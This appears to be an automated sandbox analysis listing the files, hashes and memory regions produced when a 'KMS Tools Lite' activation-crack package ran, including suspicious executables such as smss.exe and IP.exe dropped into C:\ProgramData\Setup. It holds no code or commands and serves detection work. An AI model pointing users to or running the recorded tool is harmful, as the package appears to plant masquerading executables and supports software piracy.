| MD5 | f5f5b37fd514776f455864502c852773 |
| SHA1 | 8d5ed434173fd77feb33cb6cb0fad5e2388d97c6 |
| SHA256 | 2778063e5ded354d852004e80492edb3a0f731b838bb27ba3a233bc937592f6e |
| SHA512 | b0931f1cae171190e6ec8880f4d560cc7b3d5bffe1db11525bd133eaf51e2e0b3c920ea194d6c7577f95e7b4b4380f7845c82eb2898ad1f5c35d4550f93a14b6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 12ccb1df0fd004ac7a4019ba18534987 |
| SHA1 | 3e4070a1db515851747d9e4217e913b7da5efb72 |
| SHA256 | ddddc682560170bd7265fb34fd3dfb468323bbc6c94f23ad3a24936fe3b87230 |
| SHA512 | 1a2b064f0dbefe4d9d274fc81edb28f178303b2c992acf6f142f360be854dab1674f0ee5005c73872e5fb14c88b35d9585c967b4a7c664590f26402bb79381c9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old
| MD5 | bb47cb8281cf4b188758865014cbcd4e |
| SHA1 | 923fe63a6abe3094356b102b16cfa2d2d149f274 |
| SHA256 | d4d3699d9b2aa772d33ccd5bf50323e345a042553108d0b25730d2db7b378e9e |
| SHA512 | 464360ecac7e52ffe03a4ed9d5fc3b9748258f03d5a266337ec3745c319f2cb95c072125f67c608bd39046e05a5d1e5f75ed375a0d0d4a186b4510331e9c0ae2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\0276f200-a60f-41f1-959f-ecfcfa87a7e1\index-dir\the-real-index
| MD5 | 0b35ead3858b4c9a6b2f8c7eb0e71adf |
| SHA1 | 1db30b60e1d389b09908b5a22c79d3dc25177741 |
| SHA256 | b99478a1a54b9c1eb89673a00bd70d2c5507745ad7138d2d99fb4052e805a666 |
| SHA512 | b45a486db1c5162180f2c29b0c67efd9a02786c2dca3d0bff70853ad23eea278a1025549b8d48b77730a5353e096224a40843180d5934285164f2558608fbe08 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\0276f200-a60f-41f1-959f-ecfcfa87a7e1\index-dir\the-real-index~RFe5be51d.TMP
| MD5 | 21d63a08aa4713ba0f73614e9e827925 |
| SHA1 | a1399ac8d9597e4c39e58c527b13448797b80333 |
| SHA256 | 667b375618c85cb974781303edbdd4121d3cea9dc97426fbff1ff7ecea6d61ed |
| SHA512 | 7e29c6496ad6c9c3716d9460be6ce1bbfa6e6eddad59cd8cd4d27c60f1ed54a3ac535d22fcc92ce221e74893237eadbdd3180a003c0302083b03eb79c8ae840c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
| MD5 | 679a37cd22de1db1d6ed91f3bb5a0cae |
| SHA1 | 031766b8ca7567f69830c4a5590c4906b7434385 |
| SHA256 | dfc7fda803eae59008a57bd5e73fbc7b045185dda3319654c2d065594c36e907 |
| SHA512 | cc2338a6acbf9612e0928d83b9a1b520828e63bce4f56f0232fd90946dc0db823de90808222c9e1ab2855fe5dca2fd022f6cf5c3bc281207ea007d34165aeca9 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-bn.hyb
| MD5 | 8961fdd3db036dd43002659a4e4a7365 |
| SHA1 | 7b2fa321d50d5417e6c8d48145e86d15b7ff8321 |
| SHA256 | c2784e33158a807135850f7125a7eaabe472b3cfc7afb82c74f02da69ea250fe |
| SHA512 | 531ecec11d296a1ab3faeb2c7ac619da9d80c1054a2ccee8a5a0cd996346fea2a2fee159ac5a8d79b46a764a2aa8e542d6a79d86b3d7dda461e41b19c9bebe92 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-mr.hyb
| MD5 | 0807cf29fc4c5d7d87c1689eb2e0baaa |
| SHA1 | d0914fb069469d47a36d339ca70164253fccf022 |
| SHA256 | f4df224d459fd111698dd5a13613c5bbf0ed11f04278d60230d028010eac0c42 |
| SHA512 | 5324fd47c94f5804bfa1aa6df952949915896a3fc77dccaed0eeffeafe995ce087faef035aecea6b4c864a16ad32de00055f55260af974f2c41afff14dce00f3 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-nn.hyb
| MD5 | f2d8fe158d5361fc1d4b794a7255835a |
| SHA1 | 6c8744fa70651f629ed887cb76b6bc1bed304af9 |
| SHA256 | 5bcbb58eaf65f13f6d039244d942f37c127344e3a0a2e6c32d08236945132809 |
| SHA512 | 946f4e41be624458b5e842a6241d43cd40369b2e0abc2cacf67d892b5f3d8a863a0e37e8120e11375b0bacb4651eedb8d324271d9a0c37527d4d54dd4905afab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | eba0cdd0032bfad4156bb6bd5ed94087 |
| SHA1 | feaa857d709b2340729c867005447536d7b6aa0a |
| SHA256 | c9beb42963210d0db0f2fd8c2b2f85992e257cb742cc43c9299d83f068e089d2 |
| SHA512 | bb7895abd8340941b3a0efa7a223df9003656a54b74af1ab1d45f76f076c5a62d1eea4a257d315e15d92fc826060432f13bdb82e8e0837723da08c37d3cf7fa7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 62c572652c75c8e2582e3856b1fcc7d8 |
| SHA1 | e2f63e1c2529d714adfc9a4da1dcd08cf48ad19b |
| SHA256 | 79546363f63afc7d6007fd0bd7379b6aaf13c83cf6f93a7c76799f87cb74c0f4 |
| SHA512 | 9eca7aafdc52377dcffc7ad604b5d56c6e0df350b614df0743f2261082a0a3a6c926e20c94d01c3f6009996ec039529b80c8b77a50dc7cbe93e214b77c6022e8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 5be28b1248e4d9e63e0a80329c76aef1 |
| SHA1 | 8282af6c2a597f6fcd528caa89742bc1b21d5863 |
| SHA256 | 8e560e35e18850b716747b1bbc5ba32cfc1c28c718e906e220600575de34d4bc |
| SHA512 | 350f74310f697052e1a7b75de2b2d3a5a9c2fac4043921940c4af6b9225ff7be266168312893b3a58cd5e13bcc04b056d65cadc294a3346b29a7f55a03448d29 |
memory/2560-891-0x00007FF641090000-0x00007FF641D3A000-memory.dmp
memory/2560-892-0x00007FF641090000-0x00007FF641D3A000-memory.dmp
memory/2560-894-0x00007FF641090000-0x00007FF641D3A000-memory.dmp
memory/2560-893-0x00007FF641090000-0x00007FF641D3A000-memory.dmp
memory/2560-895-0x00007FF641090000-0x00007FF641D3A000-memory.dmp
memory/2560-896-0x00007FF641090000-0x00007FF641D3A000-memory.dmp
memory/2560-897-0x00007FF641090000-0x00007FF641D3A000-memory.dmp
memory/2560-898-0x00007FF641090000-0x00007FF641D3A000-memory.dmp
memory/2560-900-0x00007FF641090000-0x00007FF641D3A000-memory.dmp
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\edge_checkout_page_validator.js
| MD5 | 1db0c159a8afc8073ed9f0a83f782ae8 |
| SHA1 | 0874d03928cc347db7f5c7720fa6c23321671fb7 |
| SHA256 | f7ee28dee8d78ac7456a683cbc673e8b3b57bc9a1ba37c0d6d5d4332a7534d93 |
| SHA512 | 4fda31e15918efa31ebbd69965e3fa1702daf6b1995af2c010a63e55030ee2f3affb4c45ea6275b7d4c35c0e61bdfbd3051872f392725394489b4c43e8cb3bf1 |
memory/2936-964-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp
memory/2936-965-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp
memory/2936-967-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp
memory/2936-968-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp
memory/2936-966-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp
memory/2936-970-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp
memory/2936-969-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp
memory/2936-971-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp
memory/2936-973-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe
| MD5 | db9c455f121b95bf2326ca1939dad9cf |
| SHA1 | 6ea25badededb817ba6b18c830906cdbbaf04837 |
| SHA256 | b8a7519e33c7e20dc3fe2383c7610e1610b9ffba438d2555c1f8b2114c094770 |
| SHA512 | 61200ea650659ed6e96431660056768f3024e012d5ed86e983ee04e424b550b4dc0bdbbb5e95c8d76d0202e1613842547b8149b650ca95b6a7e562a721568fb1 |
memory/344-990-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp
memory/344-992-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp
memory/344-994-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp
memory/344-993-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp
memory/344-991-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp
memory/344-996-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp
memory/344-995-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp
memory/344-997-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp
memory/344-999-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification.bundle.js.LICENSE.txt
| MD5 | 8595bdd96ab7d24cc60eb749ce1b8b82 |
| SHA1 | 3b612cc3d05e372c5ac91124f3756bbf099b378d |
| SHA256 | 363f376ab7893c808866a830fafbcd96ae6be93ec7a85fabf52246273cf56831 |
| SHA512 | 555c0c384b6fcfc2311b47c0b07f8e34243de528cf1891e74546b6f4cda338d75c2e2392827372dc39e668ed4c2fd1a02112d8136d2364f9cab9ee4fa1bd87f5 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Mini-Wallet\miniwallet.bundle.js.LICENSE.txt
| MD5 | 7bf61e84e614585030a26b0b148f4d79 |
| SHA1 | c4ffbc5c6aa599e578d3f5524a59a99228eea400 |
| SHA256 | 38ed54eb53300fdb6e997c39c9fc83a224a1fd9fa06a0b6d200aa12ea278c179 |
| SHA512 | ca5f2d3a4f200371927c265b9fb91b8bcd0fbad711559f796f77b695b9038638f763a040024ed185e67be3a7b58fab22a6f8114e73fdbd1cccdda6ef94ff88f3 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\fr\strings.json
| MD5 | cd247582beb274ca64f720aa588ffbc0 |
| SHA1 | 4aaeef0905e67b490d4a9508ed5d4a406263ed9c |
| SHA256 | c67b555372582b07df86a6ce3329a854e349ba9525d7be0672517bab0ac14db5 |
| SHA512 | bf8fa4bd7c84038fae9eddb483ae4a31d847d5d47b408b3ea84d46d564f15dfc2bae6256eac4a852dd1c4ad8e58bc542e3df30396be05f30ed07e489ebe52895 |
memory/4264-1831-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp
memory/4264-1833-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp
memory/4264-1834-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp
memory/4264-1832-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp
memory/4264-1835-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp
memory/4264-1837-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp
memory/4264-1836-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp
memory/4264-1838-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp
C:\KMS Tools Lite Portable\GSetup.exe
| MD5 | c3c5adf650d5cf05bd1b08590d62cf53 |
| SHA1 | 7781e1ecd78490ebaeb73314855efadff2bfeeed |
| SHA256 | ed63b2a33066ef63bdb5b99c40d660f29653386b334f45d5296ead6fbcbc2861 |
| SHA512 | 79550a7f9afccc4ee58e8f74df80653d566ceb067e9ef57baa8aeff14ace2f8730d8cc22d0fad523bb36dc6736cb112cbc21ecfe6cb657c7cd2d483026b84249 |
C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe
| MD5 | ec79cabd55a14379e4d676bb17d9e3df |
| SHA1 | 15626d505da35bfdb33aea5c8f7831f616cabdba |
| SHA256 | 44a55f5d9c31d0990de47b9893e0c927478930cef06fbe2d1f520a6d6cba587d |
| SHA512 | 00bbb601a685cbfb3c51c1da9f3b77c2b318c79e87d88a31c0e215288101753679e1586b170ccc9c2cb0b5ce05c2090c0737a1e4a616ad1d9658392066196d47 |
C:\Users\Admin\AppData\Local\Temp\data.pak
| MD5 | 6c82cca18f10641cfb82a3a79d3e67b8 |
| SHA1 | 0b6706a3adf39ca0927acaa1fc0a839f59956c07 |
| SHA256 | 4595203900ae2f65a165f3b6e3517700f2fa17139c50de47dc28bb40fd00a320 |
| SHA512 | f6769b4575dea3e6a3c77ddaf44552c30b7c8b57825145a960bfb88e5f3f80c196c98ba4a54d8f8c3abc913df7c9311bdb9b1c1263b9f020c3daccdae68b8c27 |
C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe
| MD5 | dbfabf5db79b1f10d0190c241dfeda28 |
| SHA1 | ce807ea14cbe3c6e2c1697dc6927944abb96c9f9 |
| SHA256 | 57fe3d39c4c7d7c4b1753b57cdf32bc0d90cef36cc6286eecb39ec157da15560 |
| SHA512 | a133a25fefd76730a12f6b35ca0707429d82b20f118a75326625a5ee2953222a1626ef4674681a42fde2724d1dd11a9a4ad5c8d5e4f1d799b0c6b8ab34b5c616 |
C:\ProgramData\Setup\KMS.exe
| MD5 | f9659182b0bd73c5701d4b8e0d1ee6b1 |
| SHA1 | cead395d3f19efd537c7e3b5d8077e916215cb10 |
| SHA256 | cd7201cdef3bc02005ab104f4455c37cde22af193dd96b037f2ec0e9d9ca24f1 |
| SHA512 | 02dadb1657754d30087735fdcccf601184a25067e1417edc54dd805b9fc5834a59da1147d7913665da0b08d55809e978866063a749f097ce0d8dfcd4bcd2c6e2 |
memory/1748-1876-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp
memory/1748-1884-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp
memory/1748-1885-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp
memory/1748-1887-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp
memory/1748-1886-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp
memory/1748-1888-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp
memory/1748-1882-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp
memory/1748-1883-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp
memory/4264-1890-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp
memory/4264-1889-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp
memory/1748-1895-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp
C:\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe
| MD5 | a946712c1e450742997bf04899fa3ca9 |
| SHA1 | f52e30a14e8b9cc72d11c238a5e9b9e4ca23c414 |
| SHA256 | 7af2fb51e09719a29915b53e205e6587f8bed175babb69ca959838e336e24ac2 |
| SHA512 | 62faf3120fc81cfd5ae5c96864a0222944d942956ee58e7d24aa1f21b3fbe2ceeeeeb500c3eb911fa5d793cb13e5283b4106db87707db4fd61b4a3b70fddfe51 |
memory/5544-1911-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp
memory/4264-1912-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp
memory/5544-1913-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp
memory/5544-1915-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp
memory/5544-1914-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp
memory/5544-1916-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp
memory/5544-1918-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp
memory/5544-1917-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp
memory/5544-1921-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp
memory/4264-1922-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp
C:\KMS Tools Lite Portable\Programs\Office Installer+\readme.txt
| MD5 | 85e6b4a380b1d6aa72b6f1b74ae16b30 |
| SHA1 | 1d76f8438499002ede014bd75134e6d95fd440d2 |
| SHA256 | aa791c78f5f8a0da0417c73344c2d82a6105002622d08d5575ab2a7093902cf2 |
| SHA512 | 81936e01f466cd02c87565b9599a9f37c1c576ea6c55ef2340bd26af202602c81a1b6f46a20ac90964a9b946f18c20066fb53d76ec35fa7a5e609ac1e8507244 |
memory/5544-1930-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp
memory/4264-1935-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 85de499010b7562128132ebc0c3a1416 |
| SHA1 | 858029bf99bd3e582beba61191a9edddecb1396a |
| SHA256 | eea24041b39faee7969984225e9c904619b8db4cc04594b0ad2626a68b531b7a |
| SHA512 | 8d8bd1305867d612c73e396d8653acbdc4d418fe7e87ebd26df5b650f6a77868e99b7417b02c700fb708bde813d316effc3a7db70dbb0a1db84d3b73306b1818 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | cc2ccaf50da18c6ea05e9104f1e4336b |
| SHA1 | ecbc71e1ae46b12395966b0561bbec0345c89c05 |
| SHA256 | bfc8a36417470b1f2af7cfa292d60f66913297429f15bcda91f6e3ccafca57cf |
| SHA512 | 4ef43a7883bc2712693357d756dd3eae8d32b72543180d24bdf82232a6e0e44a195bd0c32d7ed96e3bc90347565441fa7c65e38e3b76993e14ac5eab53d02fc0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 5fb6fcf6880c9c1673f91898db97eda8 |
| SHA1 | ef60070fc68f7f66a31ac673aa879909960619fe |
| SHA256 | 87dbcc0acb4372345882fc3dc734ded8797ce3b53c3faf54771efae85338f11a |
| SHA512 | fe368d0eb6024ac65731dca91e42d3d953e954a08e384e29b185d12a18b63de6cffea68f014ebce12e5ae27fb7904c08adf5b1eb111fd523d08275041d49549c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | dd3d2d1dc0d08ff200a8347a58d79818 |
| SHA1 | 3fac9b241a4f4abe1852597e5df7d45b330ae25c |
| SHA256 | 0efe016c02cdf2b06a488f27041f4831309f7ecec9db17743a0a6571d944a1e6 |
| SHA512 | 46318a01a97723b7ffcd53e803e68c3dfbfe4da3020abc002dc56aa9790ab038b76613a8d915de347f429ede718f6ccb434dddc06462e0528c96dcbd27283735 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnGraphiteCache\data_1
| MD5 | fd23bc9e6fb8d3132809a9b793a52b86 |
| SHA1 | d3377ad3d1d41b1b5fc349860e79f7dd9a18dc55 |
| SHA256 | 2887e2eef9e8e618727f3c7b181b4dff2739592cc8c3baaab1c77d5901b82748 |
| SHA512 | c39171650c84575c77033ad1962beba926e5aa924ae906e136893e82756f1fe801df3d3127d0d2677a23744755e676f5b260df38fb2dd1476224873c0e54ee14 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ef88af7a05ce79c9948c4002ffc83432 |
| SHA1 | a4d74afd972436eeb75a4f62111205195e89e852 |
| SHA256 | b65fad82e8c8f5770e57e1bba671888968eba79d9c23aff131a680093a55c519 |
| SHA512 | 1de3efa346e74b3ea49694bc5ca7a817ed1ebd2852005a77763bb47fd49eacc2ca393edf6d96058a5a92765459b9c1d7ba85224c906efa54fa5ef3515026bb02 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8ca2e04c7c32ca9bc930593d152460a0 |
| SHA1 | 3f6c98093b752ff4f94b21e2a3c764e7067dfe55 |
| SHA256 | 93c4cc2755dd2cb338f5425c4655c698c17e6d9d622792694bb2a944c12dedda |
| SHA512 | 0126e4562dcaa01d4bf68ee16b1b9f169803f639684b74bab8f09f6e5c9e6ee9953a4168f9c4eb52a55b8e9bc128ead8ea69dea9d4c9da70cfbd1541736ce044 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Variations
| MD5 | 961e3604f228b0d10541ebf921500c86 |
| SHA1 | 6e00570d9f78d9cfebe67d4da5efe546543949a7 |
| SHA256 | f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed |
| SHA512 | 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | 3e45022839c8def44fd96e24f29a9f4b |
| SHA1 | c798352b5a0860f8edfd5c1589cf6e5842c5c226 |
| SHA256 | 01a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd |
| SHA512 | 2888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | 332f92e1c68e8c9ee74b9ee1526d2da0 |
| SHA1 | 48c3cf24d0cca66e51a217a59bd7127d15d688da |
| SHA256 | 5d7f7ed437d8a1d793c944bf2263dbdd4d63a665ef5dfe2f67d4b84a925f0fec |
| SHA512 | d8db98a8cc4b9ca6c3b74bf134ca98a6090a0854e0c010402f8a48d33f0401887a4ab25276610e4c7cf29aa5227d6a507c52f86c9edfd5468c8fb3158595bbb0 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oyfkcfec.ssu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4020-2202-0x0000022D73590000-0x0000022D735B2000-memory.dmp
memory/5544-2505-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp
memory/4264-2522-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\aut3444.tmp
| MD5 | df00022673aef7242f6bdf5f72f4013d |
| SHA1 | 37bedd7e56ca5fd9b28dc2d69ac10f2c8814304a |
| SHA256 | 612527bed404d31980176a9f4e6b9f1855b60663f0ce066c3bc3756fcf9d5d82 |
| SHA512 | f2e55df33a8c32101f55b8ecda63b83f76ec1b26167d2a6feed943cb4f11f0aba56b5ec3c8e4c945064cf6c0a8e311efe12ce8e9ef84b21e564093cc6020f987 |
C:\ProgramData\Setup\IP.exe
| MD5 | 48d87a253517d7f5662a5a1b67611a68 |
| SHA1 | 9c26a289701d5549d79034854b46e8a8a88aeb62 |
| SHA256 | 9c5ca23df27a35bd532fdd8d5dcf43457d8ea8bdc6ee6a4a5866dc8ae7e425b1 |
| SHA512 | fa1bbc1836e099e7b323c39f816746c02318e6b22de571195c4a5fdc7ae42f0b810d85bfa93a638ba9d03389b1d9028df5558a8a2742bc2c1facc356c2f4e783 |
C:\ProgramData\Setup\smss.exe
| MD5 | 6fde344165a369c3586a68317279247c |
| SHA1 | e39b5038f44757a7049c4ebabbd6f62deb280796 |
| SHA256 | 90f414ca8e7fe410a19ea1be7895f8b7df55b35d4289f1bd7c8900b2c886f4b4 |
| SHA512 | 880650d5db061a4aab3df0c99ed1871de4347fb6ed7305c596fa4b75ec57e9c7acecebeeef675ba864d727a898963fe397af08a5d71e7993289299764931349a |
memory/1968-2787-0x00007FF64E820000-0x00007FF64F853000-memory.dmp
memory/1968-2785-0x00007FF64E820000-0x00007FF64F853000-memory.dmp
memory/1968-2790-0x00007FF64E820000-0x00007FF64F853000-memory.dmp
memory/1968-2789-0x00007FF64E820000-0x00007FF64F853000-memory.dmp
memory/1968-2791-0x00007FF64E820000-0x00007FF64F853000-memory.dmp
memory/1968-2786-0x00007FF64E820000-0x00007FF64F853000-memory.dmp
memory/1968-2788-0x00007FF64E820000-0x00007FF64F853000-memory.dmp
memory/4264-2792-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp
memory/5544-2793-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe605d76.TMP
| MD5 | 60b8549e709912e87ce02c48424ce866 |
| SHA1 | 527bc379f75a72a71ebfbfae40914cbec0e3aa40 |
| SHA256 | 278b3fdacf81287ebe57d79b54cca3344bd54d0bc5065e6be3cc201d6725d3bc |
| SHA512 | 6bb03c2c5512c02edbf4cdd8abb8f2d8e9c38506de2a07acfa82cb0c6a7c9549fb1ca8bd99286a4bf2d4c680621b895aa239b9121663bc9ac9710b0d1ed8ae71 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | c17d8635681a6657d64eceedd6c31811 |
| SHA1 | 0b7d1a6a4e85d6092c8a7b7f07777d7c7089d448 |
| SHA256 | f7e4d14bb0d9f5076e1dd4b146d6ba5054cce0913669b7ac18191ff42bfb2e94 |
| SHA512 | 4259266794bfb571109287542c2751534c144ee884af3ff60a0b707d78346fc968e7e54651543a88c573d22558cf31c32347ff2339bfb0c1e78a69a33e259180 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | f73ea04c5e16f5d472ea26319731b32f |
| SHA1 | 190d1753bb3068f5169dcf96110d38fe23d259aa |
| SHA256 | c5acbd2589abf7889087faaaec84b808487d543e766f2dc767e345f9ded1544d |
| SHA512 | 80d639cc347b1c8993b053f83f77e3e142bba02b63f437f7f893f252db9fc3d675c50489a320487b83f30f37d08eff505171c9853f432273a0d9028ff1049619 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\0276f200-a60f-41f1-959f-ecfcfa87a7e1\index-dir\the-real-index
| MD5 | 45f62e6ebc625107cd33c6addb35e3e5 |
| SHA1 | 822398cb40d3cde22a643071a497870ddc9d5c60 |
| SHA256 | 52ff891274912cf3d6db480568dc96e480ca43bc72b7251e74b60ec00e6df435 |
| SHA512 | 608f91d827733e03beee4207869a7b9aaf52096c54ff0823ff7056e6120fb4dd97fb1f70e6f2ed33ff319223469a2d1eee06e4c442fd261c834e77eaa605c82d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
| MD5 | 9cff6a004e4b0168be512000910abf09 |
| SHA1 | 29b7e70ae023130ce989034665d115b758fd6e32 |
| SHA256 | fe8544404427379e0bd75c9a4385220f5200a6c8c67506cad24b8d131930b6c9 |
| SHA512 | 98941fc000add64aeaf9c383244b70b6678bf2887be4cd4ce3b71c5ba72a72e83d74d488da3f2c272c72d04673de95cecd3632e38853ed47c85f2b81632e03db |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9ff49a57903a372fcfda791b5a0d2cfe |
| SHA1 | 1f7504087fd4c3bffd15cf24130c5dc8f3f2db18 |
| SHA256 | 34d552dc69a10fae8b54d76740e7843a093524492a72748e713788880bfb0a7d |
| SHA512 | f3861de3b82ad0fd3330d1dcc4ddeff85652c7bc2b7c2cf5094ad843f785f4c97d7c388222fe902455c28ab400e94ed56610bd4e3e6938f568a0790d088a824d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | aef57531bbaaa2a9021d46fd942d75cf |
| SHA1 | cd87e2e2b0f496769cff6e19e742edc0d38ff851 |
| SHA256 | 9f779a97d46dbacaf27c52953eaeb1cdc74ad469cecfaa0f300ab74f501e82bc |
| SHA512 | d18fc2e08893fbc6f540a5ab2217d4009ec6f9729f4d67d23f484208c12b0c12d17364ee19df2dec011f8bba1e0b15f1fb3f13792f11350c977c393966ef0549 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | c472049051b46e75e00d67ee7ee7fa56 |
| SHA1 | f0745bafd11081d3669e2b24d706009ce867e627 |
| SHA256 | f388e037b15459a5e78b9c79e13aeef994aa4982093c4d750fa7d09304b01651 |
| SHA512 | 7ed69a5750b563a125b7f363ee67f4886130cd8b9fb31dfc2dbaadf6fd333f3c41e4717237f48c0963be29d07d0317758639f4904beee1c28cbeb2a6c127e510 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping468_1442749833\manifest.json
| MD5 | c3419069a1c30140b77045aba38f12cf |
| SHA1 | 11920f0c1e55cadc7d2893d1eebb268b3459762a |
| SHA256 | db9a702209807ba039871e542e8356219f342a8d9c9ca34bcd9a86727f4a3a0f |
